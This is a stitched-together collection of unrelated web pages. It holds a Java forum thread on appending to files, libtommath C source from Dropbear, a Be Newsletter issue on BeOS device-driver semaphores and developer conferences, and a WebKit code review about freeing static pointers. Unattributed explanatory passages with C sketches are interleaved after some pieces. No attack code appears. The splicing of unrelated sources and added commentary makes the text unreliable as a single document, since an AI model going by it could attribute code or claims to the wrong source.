You should also split your code into Your Code and Everybody Else's code. The Webpack docs have a great guide on Code Splitting for Libraries.

Happy hacking!
https://swizec.com/blog/migrating-to-webpack-2-some-tips-and-gotchas/
Yes, I am asking for multiple Strings in a single variable — how can I do this? Making a new class of the append-file code, and how can I input multiple variables in a String? Exactly, I would like to arrange this code in my programme, but the problem is where I should put this code to append the file. I would like to implement this code in my programme to append the file; in this code, appending the file works properly, but how can I arrange it in my programme code as mentioned above... Dear Norm, yes I did it, but where do I have to implement this code in my programme? The code is written below... package org.kodejava.example.io; import java.io.*; Dear Norm, there is no error, but the text file is not appending. I want to append the same file on each and every button click. Hi guys, I am stuck badly as I am using java.nio, the new Java input/output file system packages. I just wanted to implement simple code that will append my text file. Below is the code, ...
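What the thread is circling around is append mode: open the file for appending instead of truncating it on every click. The posts are about Java's file I/O, but the idea is language-agnostic; here's a minimal sketch in C, where fopen's "a" mode does the same job. The file name and helper names are made up for illustration.

```c
#include <stdio.h>

/* Append one line to `path`. Mode "a" creates the file if it is
   missing and never truncates, so repeated calls accumulate lines —
   the "append on each and every button click" behavior. */
static int append_line(const char *path, const char *line) {
    FILE *f = fopen(path, "a");
    if (!f)
        return -1;
    fprintf(f, "%s\n", line);
    fclose(f);
    return 0;
}

/* Count lines currently in the file, to check the result. */
static int count_lines(const char *path) {
    FILE *f = fopen(path, "r");
    int c, lines = 0;
    if (!f)
        return 0;
    while ((c = fgetc(f)) != EOF)
        if (c == '\n')
            lines++;
    fclose(f);
    return lines;
}
```

The Java equivalent the thread is after is constructing the writer in append mode rather than the default truncating mode.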
http://www.javaprogrammingforums.com/search.php?s=0d94e8c501bf0eb0ff728fc666d03f93&searchid=1027632
libtommath/bn_mp_cnt_lsb.c @ 457:e430a26064ee DROPBEAR_0.50 (Make dropbearkey only generate 1024 bit keys)

#include <tommath.h>
#ifdef BN_MP_CNT_LSB

static const int lnz[16] = {
   4, 0, 1, 0, 2, 0, 1, 0, 3, 0, 1, 0, 2, 0, 1, 0
};

/* Counts the number of lsbs which are zero before the first one bit */
int mp_cnt_lsb(mp_int *a)
{
   int x;
   mp_digit q, qq;

   /* easy out */
   if (mp_iszero(a) == 1) {
      return 0;
   }

   /* scan lower digits until non-zero */
   for (x = 0; x < a->used && a->dp[x] == 0; x++);
   q = a->dp[x];
   x *= DIGIT_BIT;

   /* now scan this digit until a 1 is found */
   if ((q & 1) == 0) {
      do {
         qq  = q & 15;
         x  += lnz[qq];
         q >>= 4;
      } while (qq == 0);
   }
   return x;
}
#endif

/* $Source: /cvs/libtom/libtommath/bn_mp_cnt_lsb.c,v $ */
/* $Revision: 1.3 $ */
/* $Date: 2006/03/31 14:18:44 $ */
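The nibble-table trick in mp_cnt_lsb() is not specific to mp_int. Here is the same algorithm transplanted onto a plain unsigned int as a self-contained sketch (the lnz table is copied from the code above; the function name is mine):

```c
/* lnz[n] = number of trailing zero bits in the 4-bit value n
   (with lnz[0] = 4, meaning "whole nibble is zero, keep going"). */
static const int lnz[16] = {
    4, 0, 1, 0, 2, 0, 1, 0, 3, 0, 1, 0, 2, 0, 1, 0
};

/* Count trailing zero bits of a, scanning a nibble at a time,
   mirroring the loop in mp_cnt_lsb(). Returns 0 for a == 0,
   matching mp_cnt_lsb's "easy out". */
static int cnt_lsb(unsigned int a) {
    int x = 0;
    unsigned int qq;

    if (a == 0)
        return 0;
    if ((a & 1) == 0) {
        do {
            qq = a & 15;     /* low nibble */
            x += lnz[qq];
            a >>= 4;
        } while (qq == 0);   /* an all-zero nibble means keep scanning */
    }
    return x;
}
```

For example, 8 (binary 1000) has three trailing zeros, and 16 (binary 10000) has four — the first nibble is all zero, so the loop consumes it and continues into the next one.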
https://hg.ucc.asn.au/dropbear/file/e430a26064ee/libtommath/bn_mp_cnt_lsb.c
static class variables and module scope. Discussion in 'Python' started by The Dark Seraph, Jul 19, 2004.
http://www.thecodingforums.com/threads/static-class-variables-and-module-scope.333357/
This article continues the exploration of process synchronization in BeOS device drivers. You may want to review the first article, "Synchronization in Device Drivers," from three months ago. That article concluded with an example of the "z" facility which coordinates multiple "producers" and "consumers." This method yields a "broadcast" form of synchronization, where each thread examines the shared data, determining whether to proceed. As an exercise for readers, I did not show the version which uses just one semaphore. One reader, Oleg, deserves honorable mention for e-mailing the correct code. My single-semaphore version follows. It assumes greater responsibility, being able to both coordinate threads and to lock data structures. In the previous article, locking was achieved through the lock()/unlock() calls.

struct wchan {
    sem_id xsem, wsem;
    uint nthread;
};

void wacquire(struct wchan *w)
{
    static spinlock sl;
    cpu_status ps = disable_interrupts();

    acquire_spinlock(&sl);
    if (w->xsem == 0) {
        w->xsem = create_sem(1, "excluded");
        w->wsem = create_sem(0, "waiting");
    }
    release_spinlock(&sl);
    restore_interrupts(ps);
    acquire_sem(w->xsem);
}

void wrelease(struct wchan *w)
{
    release_sem(w->xsem);
}

void wsleep(struct wchan *w)
{
    ++w->nthread;
    release_sem(w->xsem);
    acquire_sem(w->wsem);
    acquire_sem(w->xsem);
}

void wakeup(struct wchan *w)
{
    if (w->nthread) {
        release_sem_etc(w->wsem, w->nthread, 0);
        w->nthread = 0;
    }
}

A wchan struct is allocated (statically) to protect a set of data, around which multi-threaded activities occur. An example is driver data for a serial port. N serial ports would require N wchan structs. The general idea is to acquire exclusive use of the data when you enter the driver, and relinquish it when you leave; the relevant calls are wacquire() and wrelease(). Within the driver, you may block for any reason, by calling wsleep(), whereupon you temporarily lose control of the data.
After unblocking, you automatically have control of the data, but it may have changed while you were "asleep." How were you woken up? By another thread in the driver, who called wacquire() and then wakeup(). To simplify the discussion, this article is ignoring hardware interrupts entirely. Therefore, all flows-of-control are assumed to be background threads and, of course, in the kernel. As most hardware is operated with interrupts, this code would need augmentation before such use. See the previous article for details.

Here is the standard BeOS "control" entry-point for our hypothetical driver. It demonstrates the use of the "wchan" facility. Since there are no interrupts, all data producer and consumer threads must call this function. PUT_DATA is a producer command, while GET_LINE and FLUSH_ON_NULL are consumer commands. WAIT_FOR_MORE and WAIT_UNTIL_EMPTY consume nothing, but merely synchronize on some condition.

struct device {
    struct wchan w;
    struct clist clist;
};

status_t dev_control(void *v, uint32 com, void *buf, size_t len)
{
    struct device *dp = (struct device *)v;
    status_t s;

    wacquire(&dp->w);
    s = control(v, com, buf, len);
    wrelease(&dp->w);
    return (s);
}

static status_t control(void *v, uint32 com, void *buf, size_t len)
{
    struct device *dp;
    size_t i;

    dp = (struct device *)v;
    switch (com) {
    case GET_LINE:
        while (findchar(&dp->clist, '\n') == 0)
            if (wsleep(&dp->w) == 0)
                return (B_INTERRUPTED);
        for (i = 0; i < len; ++i) {
            int c = getc(&dp->w, &dp->clist);
            if (c < 0)
                return (B_INTERRUPTED);
            ((char *)buf)[i] = c;
            if (c == '\n')
                break;
        }
        break;
    case FLUSH_ON_NULL:
        while (findchar(&dp->clist, 0) == 0)
            if (wsleep(&dp->w) == 0)
                return (B_INTERRUPTED);
        while (dp->clist.nchar)
            if (getc(&dp->w, &dp->clist) < 0)
                return (B_INTERRUPTED);
        break;
    case WAIT_FOR_MORE:
        i = dp->clist.nchar;
        while (dp->clist.nchar == i)
            if (wsleep(&dp->w) == 0)
                return (B_INTERRUPTED);
        break;
    case WAIT_UNTIL_EMPTY:
        while (dp->clist.nchar)
            if (wsleep(&dp->w) == 0)
                return (B_INTERRUPTED);
        break;
    case PUT_DATA:
        for (i = 0; i < len; ++i)
            if (putc(&dp->w, &dp->clist, ((uchar *)buf)[i]) < 0)
                return (B_INTERRUPTED);
    }
    return (B_OK);
}

The purpose of the driver is to pass data between user-level threads. Data is buffered with byte-wide FIFOs, using the putc() and getc() calls. As a convenience, these will block when there is no data to get, or too much data already buffered. Note the call to wakeup() whenever the FIFO changes: This serves all threads in the driver, not just those sleeping in the clist module.

struct cdata {
    struct cdata *next;
    uchar c;
};

struct clist {
    struct cdata *head, *tail;
    uint nchar;
};

int putc(struct wchan *w, struct clist *cl, int c)
{
    struct cdata *d;

    while (cl->nchar >= CLISTMAX)
        if (wsleep(w) == 0)
            return (-1);
    d = (struct cdata *)malloc(sizeof *d);
    d->c = c;
    d->next = 0;
    if (cl->head)
        cl->tail->next = d;
    else
        cl->head = d;
    cl->tail = d;
    ++cl->nchar;
    wakeup(w);
    return (c);
}

int getc(struct wchan *w, struct clist *cl)
{
    struct cdata *h;
    int c;

    while (cl->nchar == 0)
        if (wsleep(w) == 0)
            return (-1);
    h = cl->head;
    c = h->c;
    cl->head = h->next;
    --cl->nchar;
    free(h);
    wakeup(w);
    return (c);
}

bool findchar(struct clist *cl, uint c)
{
    struct cdata *d;

    for (d = cl->head; d; d = d->next)
        if (d->c == c)
            return (TRUE);
    return (FALSE);
}

Devising a more conservative protocol for wakeup() calls in the clist module would greatly improve efficiency. A larger blocking factor for malloc() would also help! The attentive reader might have noticed that wsleep() is defined as returning void, but is used as if it returns bool. This leads us to a key topic: The failure to acquire semaphores. The call acquire_sem() blocks until it succeeds; this is rarely the desired behavior for device drivers. The user may wish to abort an operation which is lagging or hung. Programs may want to timeout automatically, and retry. This is all possible with the acquire_sem_etc() call.
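Stripped of the wsleep()/wakeup() blocking, the clist module is just a singly-linked byte FIFO. Here is a standalone, non-blocking sketch of the same structure (the helper names are mine, not the article's):

```c
#include <stdlib.h>

/* The article's clist minus the blocking: a singly-linked byte FIFO. */
struct cdata { struct cdata *next; unsigned char c; };
struct clist { struct cdata *head, *tail; unsigned nchar; };

/* Link a new byte at the tail. */
static void cl_put(struct clist *cl, int c) {
    struct cdata *d = malloc(sizeof *d);
    d->c = (unsigned char)c;
    d->next = NULL;
    if (cl->head)
        cl->tail->next = d;
    else
        cl->head = d;
    cl->tail = d;
    cl->nchar++;
}

/* Unlink the head byte; -1 when empty (the driver version blocks instead). */
static int cl_get(struct clist *cl) {
    struct cdata *h = cl->head;
    int c;
    if (!h)
        return -1;
    c = h->c;
    cl->head = h->next;
    if (!cl->head)
        cl->tail = NULL;
    free(h);
    cl->nchar--;
    return c;
}

/* Push three bytes through and check FIFO order; 1 on success. */
static int fifo_demo(void) {
    struct clist cl = { NULL, NULL, 0 };
    cl_put(&cl, 'a'); cl_put(&cl, 'b'); cl_put(&cl, 'c');
    if (cl_get(&cl) != 'a') return 0;
    if (cl_get(&cl) != 'b') return 0;
    if (cl_get(&cl) != 'c') return 0;
    return cl_get(&cl) == -1;   /* now empty */
}
```

The driver version simply wraps cl_put/cl_get in the "wait until there is room / wait until there is data" loops shown above.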
When a timeout occurs, or the thread is sent a signal, the call returns without having acquired the semaphore. The driver must respond, usually by returning an immediate error. I must admit failure myself, in being unable to work this into the above implementation of "wchan." Readers are welcome to respond. Therefore, I must return to a BYOB (bring your own blockable) approach, as in the first article. To recap, each thread that wants to block until "something happens" will call wsleep(). A semaphore is created on the spot, and added atomically to the list of waiting threads. Later, a different thread will call wakeup(), with the usual broadcast effect. The return from wsleep() is TRUE. However, the return may be FALSE. In this case, a signal is pending. This could have arrived during the wsleep(), or some time before. When using acquire_sem_etc(), the BeOS will not allow a thread to block, or remain blocked, with a pending signal. For the good of the driver, the error must be propagated from wsleep(), and then out of the driver. All this occurs in the following code:

struct wchan {
    sem_id sem;
    struct wlink *threads;
};

struct wlink {
    sem_id sem;
    struct wlink *next;
};

void wacquire(struct wchan *w)
{
    static spinlock l;
    cpu_status ps = disable_interrupts();

    acquire_spinlock(&l);
    if (!w->sem)
        w->sem = create_sem(1, "excluded");
    release_spinlock(&l);
    restore_interrupts(ps);
    acquire_sem(w->sem);
}

void wrelease(struct wchan *w)
{
    release_sem(w->sem);
}

bool wsleep(struct wchan *w)
{
    status_t b;
    struct wlink *l = malloc(sizeof *l);

    l->sem = create_sem(0, "waiting");
    l->next = w->threads;
    w->threads = l;
    release_sem(w->sem);
    b = acquire_sem_etc(l->sem, 1, B_CAN_INTERRUPT, 0);
    acquire_sem(w->sem);
    return (b == B_OK);
}

void wakeup(struct wchan *w)
{
    struct wlink *l;

    while ((l = w->threads)) {
        release_sem(l->sem);
        delete_sem(l->sem);
        w->threads = l->next;
        free(l);
    }
}

The dev_control() should now be fully understandable.
This article has illustrated some fairly sophisticated approaches to process synchronization, which should help writers of BeOS device drivers. There are multiple ways to coordinate threads, and to prevent corruption of data structures. The approach that a driver writer adopts will depend on the service being exported, and the particulars of the hardware. I wanted to give you all a synopsis of our European developer's conferences, which were held several weeks ago, and respond to some of our European developers' comments. Without further ado... There were two sites for the conferences, one in London and one in Frankfurt. The London conference was held at Planet Hollywood and was attended by about 40 developers. There was a small theater in the back of the building operated by a nice old guy named Reg. Reg's first comment was "Hey, I'll try to help, but I don't know anything about computers." I showed him the OS and the VideoMania demo, and he was literally walking about telling his co-workers "we need to get one of those boxes!" (It's nice to know there's still some unconquered minds out there!) Time seemed short in London, and Christophe had to drag me out of the building at the end. Computer Warehouse, a distributor of Macintosh clones, was there demonstrating a Tanzania-based clone in a dusty blue case called...the BE MACHINE! We had some problems with the keyboards, but once we cleared these up things went fine. The Frankfurt conference was held in a community center and was attended by about 60 developers. We had more time, and when the presentations were over, people began pulling out their Zip drives and doing some coding, trading ideas and files. PIOS, a German clone maker, was there displaying a machine that will eventually be able to boot 6 different operating systems, including the BeOS. The European developers in attendance were, on average, younger than their US counterparts. While optimistic, many were concerned about Be's direction. 
Many commented on things like the BeBox, GeekPort and database features of the original BeOS. They didn't so much think these were the most important features overall for the BeOS, but they definitely felt they were distinctive, and led them to investigate Be in the first place. The European developers seemed extremely technically-oriented, even as compared to their US counterparts. They have very technical schooling and really know the BeOS. However, they didn't seem as concerned with making money from their efforts as the US developers. One of the best things that came out of the conference is that I think many of the developers left with the realization that they could commercialize their products with some effort and some help from Be Europe.

To the European developers: You have an incredible resource in the Paris office! They have a huge amount of experience and they want to help you commercialize your products. Please, contact them and let them help you. Speaking of contacting, many of the developers had questions and comments at the conference. Most of your comments I have already made known here at Be, and I have answers for many of your questions which I will begin emailing back to you this week. If you don't get a response before Boston MacWorld, send me a message at geoff@be.com.

The business stuff aside, the mood and small sizes of the conferences made for two great parties. England and Germany, both known for good beer! I'd like to thank all of you who were there for making my trip so enjoyable, and I hope to see you all again soon!

One of the measures of excellence that most software engineers are proud of utilizing is the "I stayed up this late" factor. Dude, I stayed up 'til 5am to get this nifty feature working!! I did that last night, and I proudly showed the fruits of my labors to my wife in the morning, to which she responded, "Well, that's not very practical is it?"
She was absolutely right, the feature I had implemented wasn't very practical, but it has sales appeal! You want a little sizzle with that steak?

Man, you wouldn't believe how many Master's Awards entries we've seen in the last hours approaching the entry deadline. Now, I've been on the vanguard of a few emerging platforms in my day, and the objections come in waves. Something new... It will never work... Oh that thing, there's no software for it... It doesn't run Windows apps... The words are all too familiar, and all too often we in the herd blindly follow the beat of the Master drum without looking very closely at the veracity of the statements. Well, in my humble opinion, the BeOS is quickly approaching that critical mass point. We survive long enough, interesting software shows up, a cottage industry is born. I'm telling you, this software is hot! And new stuff is coming all the time. We've got music, lights, sounds, movies, spreadsheets, mail, paint, word processing. If you ask me, I think we're beginning to look lively.

But let's not stop here. The BeDC is coming right quick, and if you're going you'll likely be able to see all this nifty stuff. We'll have an impromptu 3D contest, we're giving out machines, we're giving out disks, there will be dancing, singing, food, entertainment, and the Macintosh faithful.

But before you go, have you ever considered how many infrared output devices exist in your world? I took a quick look around the office and found a keyboard, mouse, several TV and VCR controllers, and even a couple of PDA devices that do IRDA transfers. The funny thing about infrared is that you get to sit further away from the device you are controlling. Say, in the comfort of your living room chair, or on your bed, or what have you. It's pretty easy to train an infrared receiver to recognize when signals are coming from a particular device. So here's some more info on that prototype board that we're using to do IR.
Insight Electronics 1-800-677-7716 Part: CDB8130 $200 (for two boards) This is one of those times when I say, just go out and buy this thing. What kind of a geek are you anyway? It's loads of fun, and when you figure out that you can go buy one of those infrared keyboards for about $80, you'll have no end of fun as to the evil you could do with it. So, to recount, we have lots of software, lots of nifty video thingies, lots of MIDI thingies, bunches of game-type thingies, accelerated 3D graphics. It's beginning to smell like soup. I think when our many thousands of magazine readers get their disks, they will be eager to buy software to play on their new toy. This is where we want to be. So before you head for Boston, do just one more compile knowing that there will be thousands of end-users who will be interested in your wares real soon now. Almost every day, we get mail from people interested in investing in Be. This is very flattering, we very much appreciate the sentiment it reveals, but law and common sense—they sometimes agree—dictate we decline. I can understand the interest: In the seventies, one of my colleagues at Hewlett-Packard and Data General, Bill Foster, started a company called Stratus; they made a non-stop computer system, roughly going after the same market as Tandem, a phenomenal success at the time. On the occasion of one of my trips to the East Coast, I called on Bill Foster and offered to put my savings in his company. He smiled, thanked me and declined very politely. I was very disappointed and, for a while, considered buying a McDonald's franchise in Paris. Fortunately, your opinion may vary, that didn't happen either and I decided I still loved computers after all. A decade and a half later, I finally invested in a start-up, Be Inc., and I now have a much better perspective on the wisdom of US securities laws and the reasons for the barriers they erect between professional investors and the rest of us. 
Investing early in a high-tech start-up looks enormously attractive. Compute the returns. Today, how much is $1,000 invested in the early Microsoft worth? Or Apple, or Intel, or SGI, or Oracle—the list is wonderfully long and interesting. It attests to the greatest, fastest, legal creation of wealth in the history of mankind around Sand Hill Road in Menlo Park, CA. That road is also known as VC Gulch for its high concentration of venture capital firms. How could one not want to get in at the ground floor and enjoy the ride? Well, there are the crashes. The roadsides of VC Gulch are littered with the carcasses of failed start-ups. Early stage high-tech companies are not good places to park college education or retirement money. Hardier individuals will object they know the risks and are willing to invest anyway: They're able and willing to put discretionary funds in play without endangering their or their family's future. In some very limited cases, the law allows individual investors to play in the same field as the pros. The restrictions are severe and involve, among other parameters, high requirements for the individual's net worth and education—and lots of paperwork. See your friendly securities attorney for details. There is more. Early stage companies have ambitious plans, they aim high. But software or ASICs take time, the rendez-vous in orbit with some other technology may or may not happen. For a number of reasons, the company you've invested in needs more time, more money. At this stage, professional investors make a decision: They put more money in the company, or they don't. If they do, or if new investors come in, they evaluate the "updated" opportunity offered by the company in a number of ways. If some pros decide not to put in more money, it means they see a higher risk and/or a lower reward than they like. As a consequence, the company has to offer better terms in order to make itself at least as attractive as other deals the pros could invest in. 
Practically, the share of the company owned by the earlier round investors shrinks to a smaller percentage, sometimes a much smaller one. This is still preferable to closing the business, so shareholders (including the founding employees) acquiesce. They see a potential in the business, they need money to actualize said potential, and they're willing to pay the price in reducing their percentage holding. The dilution is sometimes severe enough to be called "washing out." This is not a problem for investors who stay with the play and put money in the new round. They usually conserve their percentage of the company or pretty close to it, depending upon complex sets of terms in their initial investment. New investors also try to treat employees well by issuing new options, they need their commitment. So, assuming the company ultimately makes it, the only parties who really suffer in this process are the investors who don't play in the new round. If they are pros, washing out and being washed out is part of their everyday life. No hard feelings. They made a judgement call. For the "small," non-professional investor, re-investing may or may not be possible; being washed out might be perceived as an unfair experience, cautionary paperwork or not. That's where securities law and common sense agree in preventing normal people from playing with, or against, the pros. Who wants to bet money and play pick-up basketball against Michael Jordan or Dennis Rodman? And, no, I have no VC names in mind as I write.

An initial public interest suggestion—that all Be developers should buy the full-blown issue of the Preview Release rather than wait to get it for free—generated a lot of mail (and no objections).
War stories were swapped ("...they all laughed when I sat down to my BeBox..."), and opinions on the blinking green lights exchanged (everybody seems to like them; one listener suggested that a BeBox-bezel clone to snap onto the front of the StarMax machine would be a great Christmas present). Ingmar Krusch fairly assessed the co-worker critic situation: “When someone laughs at my box, I turn the power off, back on, boot in 15 seconds, switch to 32 Bit resolution, open up 6 [QuickTime] movies and ask if their Pentium can do equal... [Of course] If they're not blown away by this and ask for real world applications, you should start improvising.” The thread was not without its nay-sayers. Jonathan Perret (a "believer" nonetheless, he assures us), answered Mr. Krusch's question: “You got a Millennium? As soon as I switch to 32-bit, all the redraws get very slow and ugly... Then I launch 6 QuickTime movies, the hard drive seeks like mad and renders the system nearly unusable—besides the fact that the movies are no longer at 25 fps. And besides, it's not *that* impressive. NT does it fine, in case you didn't know.” After the expected rebuttal, the thread opened a can of Pentium vs. PPC. Sit back, this one will probably be with us for awhile. An initial question about unblocking a semaphore-blocked thread turned into a wider discussion of signals after one of our readers suggested using send_signal() instead of suspend_thread(). Are signals evil, non-portable, and old-fashioned? Or are they the only way to design a modern multi-tasking kernel? Also, is there a difference between "thread safe" and "signal safe"? THE BE LINE: Contrary to a notion developed in this thread, suspend_thread() *does* work on a semaphore-blocked thread (the thread is immediately unblocked and suspended, as described in the Be Book). However, there *is* a bug on the resume side—if the suspend_thread() and resume_thread() calls are too close to each other, the resume is ignored. 
For now, stick a greater-than-3ms snooze between the calls (this is demonstrated in the Be Book in the snooze() description, but the snooze value is a bit on the low side.) As folks received their Preview Release CDs, they pointed out some of the rough edges, disagreed with some of the interface decisions, and made some suggestions (quoting from a variety of unnamed sources): Kaleidoscope: "When you resize the window to be tall enough, a slice at the bottom doesn't refresh properly." "Be seems to be measuring double-click intervals from mouse-down to mouse-down, rather than (IMHO correctly) mouse-up to mouse-down." "If you want the movies to play REALLY fast, here's a secret tip: Push down the Caps Lock key before starting them. " (from Jake Hamby of Be) NetPositive: "Open it up, resize it only horizontally and see the dirty trail the Location TextControl leaves behind." Tracker: "If you click on a file/folder name to edit it, the cursor stays in the I-beam "edit text" shape until you do it again." How do you treat an action that occurs "in the middle" of a series of undo/redo's? Should it be added to the end of the list, or inserted at the current position? Is it possible to store the action state as a tree (for undo, yes, but redo would be ambiguous). Also, it was suggested that Be needs a standard undo/redo key mapping. How about Alt-z/Alt-Z? Should this be user or app-settable? And where are those user interface guidelines? This led to a discussion of the "F<n>" keys—should they be used more often? As an example, Jon Ragnarsson suggested using an F<n> key to show/hide Replicators. Sander Stoks wrote in to ask about the transparent 32 bit bug—is it fixed in PR? The thread then became a discussion of how to manage windows that contain lots of views: Should you really have to "roll your own" views (by creating and managing rectangles yourself) in order to avoid the efficiency hit of multiple views? 
It was suggested that while it may be lamentable that BViews tend to become very slow when you throw a few dozen into a single window, this is simply the way of the Be world... Jon Watte: “The only alternative I can see is moving lots of stuff from the app_server into libbe.so, and have the app_server ONLY talk to BWindows, letting BViews be handled entirely on the client side. That would reduce communication, but would probably have other problems, since that's not the solution they chose.” Marco Nelissen: “You could do it the other way around... Ideally, you should be able to add your own modules to the app_server, which would then perform layout, drawing, or whatever else needs to be done fast.” Dianne Hackborn: “...there's no reason to put layout managers in the app_server: Since they typically don't interact with the user, they don't really need the capabilities of a BView; about the only app_server-related functions they need to work with are Draw(), FrameResized(), etc., and those all can be handled outside of transactions with the server, with little trouble.” So—why isn't the BView class faster? Where does the time go? Dianne Hackborn suggested that it's sunk by the amount of data that flows between the client and the server. Jon Watte says the amount of data doesn't matter—it's the communication overhead that's consumptive. So should multiple manipulations be bracketed by calls to BWindow's DisableUpdates() and ReenableUpdates() (in order to batch the commands)? Mr. Stoks' question never did get answered. THE BE LINE: The 32-bit transparency bug has been fixed (in PR).
http://www.haiku-os.org/legacy-docs/benewsletter/Issue2-30.html
For this enhancement we should keep in mind that freeing statically allocated pointers takes time, which may delay the quit process. This may not be desired in standalone web browsers. However, sometimes it is good to free statically allocated pointers, but this method should not have a performance impact when it is disabled.

Created attachment 34058 [details] First draft patch

(In reply to comment #1)
> Created an attachment (id=34058) .

- StdLibExtras.h is overwritten to support these pointers
- Since heap.destroy() must be called for JSGlobalData before delete, I created a new derived class, because template specialization created multiple definitions for StaticPtr<JSGlobalData>::free() (See JSDOMWindowBase.cpp -> commonJSGlobalData())
- I am sure this patch should be cut into multiple parts. Do you have any suggestions for this?
- Some destructors are only declared, but never implemented. Why? (~ImageLoadEventSender(), ~FontCache())
- And an interesting observation: some AtomicStrings are defined as const, and some are not, but all of them seem like fixed strings. Should we change all of their types to "const AtomicString"?

This patch works with the Qt port nicely (after some fixes).

I have grave doubts about the ability of this to work for all static pointers. In particular I think the global static AtomicStrings in HTMLNames will cause problems. Before seeing something like this go in, I'd want to see it work for all the global statics and know that it wouldn't be a maintenance burden to keep it working when new ones are added or the order of them changed, etc.

I think enabling/disabling static pointer destruction should also be controllable by a runtime option (once enabled with the compile-time option).

If I remember correctly, Mac OS X's "leaks" tool correctly ignores static pointer leaks. Can't valgrind do the same? With DEFINE_STATIC_LOCAL we even put them all into a custom section, which should make them super-easy to ignore.
;)

(In reply to comment #4) I think this would be an easy feature, since WTF::StaticPtrBase::freeStaticPtrs() must be called from the code itself. With a runtime option we can easily prevent the call of this function.

(In reply to comment #5) The problem is with the transitive allocations. Valgrind does not track the use of 'this' pointers. Let A be a static object, and it allocates a B object, which also allocates a C object: A()->B()->C(). In this case valgrind cannot see that B and C belong to the A object, and reports them as memory errors. Perhaps it would be too time consuming to detect these situations.

Comment on attachment 34058 [details] First draft patch

I think it's a good idea to make our globals more consistent. But probably not such a great idea to start what could be a massive project without a good idea how we'll test this and keep it working as each global is added. Is the goal here to make memory leak debugging tools work better? Or is there value beyond that? As part of this, are you proposing that DEFINE_STATIC_LOCAL be the only legal way to make global variables? An excellent economy in the project at the moment is that we don't try to write all the deallocation code for all the global objects.

> wtf/RefCountedLeakCounter.cpp \
> wtf/TypeTraits.cpp \
> + wtf/StaticPtr.cpp \
> wtf/unicode/CollatorDefault.cpp \

I believe this is supposed to be in alphabetical order, so it should come before TypeTraits.cpp.

> +#include "config.h"
> +
> +#include "StaticPtr.h"

Extra blank line here.

> + StaticPtrBase() {
> +#if ENABLE(FREE_STATIC_PTRS)
> + m_next = head();
> + m_head = this;
> +#endif
> + };

Extra semicolon here. I think this would read better if the inline implementation were outside the class definition, since it has an #if in it. There's no reason we have to have the ifdef in here. But a better alternative would be to just leave out the constructor definition entirely when FREE_STATIC_PTRS is not enabled.
If there are no constructor definitions then the class automatically will have an empty default constructor, which is what we want.

> + StaticPtr(PtrType ptr) : StaticPtrBase(), m_ptr(ptr) { };
> + StaticPtr() : StaticPtrBase(), m_ptr(0) { };
> + ~StaticPtr() { };

No need to explicitly initialize StaticPtrBase since there are no constructor arguments. Extra semicolons here. No need to explicitly declare the destructor -- this is the same as the compiler-generated destructor, and it's much better style to not declare it.

> + PtrType operator=(PtrType);

This seems like bad style. Since values stored in this pointer will be freed, I think we want this to use some explicit style like OwnPtr rather than plain assignment.

> + ValueType& operator=(ValueType&);

This seems quite strange. Why do we need to allow assignment to the pointer from a non-const reference to the value type? This seems very dangerous, since the value type will later be destroyed.

> + PtrType operator&();
> + PtrType operator&() const;

Do we need this operator? What coding style is going to require this?

> + // Condition operators
> + bool operator!();

Should be const. Please look at OwnPtr for some ideas on how to make this class work. This should be much closer to OwnPtr, which has exactly the same semantics.

> +protected:

I believe these members should be private, not protected.

> +#if !PLATFORM(QT)
> delete data;
> +#endif

This seems clearly wrong. Did you mean this to be a FREE_STATIC_PTRS ifdef?

> + StaticGlobalData() : WTF::StaticPtr<JSGlobalData>() { };

This constructor is entirely unnecessary.

> +protected:

Should be private, not protected.

> +#if ENABLE(FREE_STATIC_PTRS)
> + virtual void free() {
> + m_ptr->heap.destroy();
> + delete m_ptr;
> + }
> +#endif

Incorrect brace style here.

> +ALWAYS_INLINE JSGlobalData* StaticGlobalData::operator=(JSGlobalData* value)
> +{
> + m_ptr = value;
> +}

Seems poor to use plain assignment of a raw pointer for an operation that transfers ownership.
> - return globalData;
> + return &globalData;

This line of code seems wrong. You want a JSGlobalData*, not a StaticGlobalData*. This is a poor use of operator overloading.

review- for now based on the specific problems with the patch, but I do also have project-direction concerns here, although I am not using reviewer power to try to enforce those.

(In reply to comment #8)
> (From update of attachment 34058 [details])
> I think it's a good idea to make our globals more consistent.

Thank you!

> But probably not such a great idea to start what could be a massive project
> without a good idea how we'll test this and keep it working as each global
> is added.

Totally agree. It is not my custom to submit a patch in such a draft phase, but I feel this project is more about finding a way to define globals which everyone _likes_ than about the actual code itself. I know this is risky, and may never be a successful project, but it is worth a try, isn't it? :) I will fix the typos and answer all your questions tomorrow. Once again, thank you for your detailed feedback!

(In reply to comment #8)
> (From update of attachment 34058 [details])
>.

Being able to "reset" WebCore to its pre-cached-local-statics state would be useful for the iPhone OS port. We don't care about tearing down objects when exiting a process, but being able to clear out the cached static variables on demand would be useful.

Created attachment 34131 [details] Second draft patch

Unfortunately there are several ways to define global variables; I don't think it is possible to merge them into a single preprocessor define:

- using DEFINE_STATIC_LOCAL
  * creates static global variables inside a function
  * the object is created upon the first call of the function
- using DEFINE_GLOBAL (WebCore/platform/StaticConstructors.h)
  * these variables cannot be freed, since they are allocated on the heap
  * workaround: wrapper classes

Any better idea?
  * fortunately it is a rarely used directive (only two classes: AtomicString and QualifiedName)
- Plain global variables: [static] class* [class_name::]variable;
  * I will try to use a static analyzer tool to find these objects
  * my proposal: use '[static] WTF::StaticPtr<class> [class_name::]variable;' instead of them in the future

WTF::StaticPtr is similar to OwnPtr, except that only one object can be assigned to it. The object can be passed to the constructor, or assigned later.

> Is the goal here to make memory leak debugging tools work better? Or is there
> value beyond that?

Ok, you win here :) tonikitoo and ddkilzer mentioned they could use this feature. I also plan to use it for embedded devices, but first I would like to know whether it is possible to do it. But right now they are just plans, nothing more.

>?

"WTF::StaticPtr<class>" would be a substitution for "class*", and it would mimic the default C++ pointer behaviour as much as possible (with operator overloading). I hope "class&" definitions are rare except for DEFINE_STATIC_LOCAL.

> As part of this are you proposing that DEFINE_STATIC_LOCAL be the only legal
> way to make global variables?

No. DEFINE_STATIC_LOCAL has a special purpose, and it looks like it does not cover everything. Well, I think a global policy can be:
- either do not write destructors (someone else can do it later)
- or write a working and tested destructor.

> > +#if !PLATFORM(QT)
> > delete data;
> > +#endif

This delete causes a segmentation fault in Qt. It has not appeared until now, since this destructor is never called. (Although this code may have worked when the destructor was implemented, it was not covered by regression tests, and has gone wrong eventually.) I think if we write a destructor, we have to maintain it like the rest of the code, and should cover it in regression tests. This may be a good aim for this project.

I have fixed the typos and other things (the code looks much better now), except:

> > + PtrType operator=(PtrType);
>
> This seems like bad style.
